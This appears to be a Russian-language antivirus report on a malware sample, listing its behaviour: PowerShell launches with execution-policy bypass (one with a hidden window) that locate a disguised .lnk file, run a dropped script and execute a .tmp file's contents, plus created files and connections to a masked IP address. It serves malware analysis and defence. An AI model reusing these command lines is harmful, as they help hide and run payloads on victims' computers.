Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -c $t=0x1a1f;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\*\*.lnk | where-object{$_.l...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -f %ALLUSERSPROFILE%\p.ps1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -c " Invoke-Expression (Get-Content C:\\ProgramData\\G3892.tmp);"
Изменения в файловой системе
Создает следующие файлы
- %ALLUSERSPROFILE%\p.ps1
- %ALLUSERSPROFILE%\a1172
Сетевая активность
Подключается к
- '74.##.94.175':9992
- '74.##.94.175':7032
Другое
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -c $t=0x1a1f;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\*\*.lnk | where-object{$_.l... (со скрытым окном)
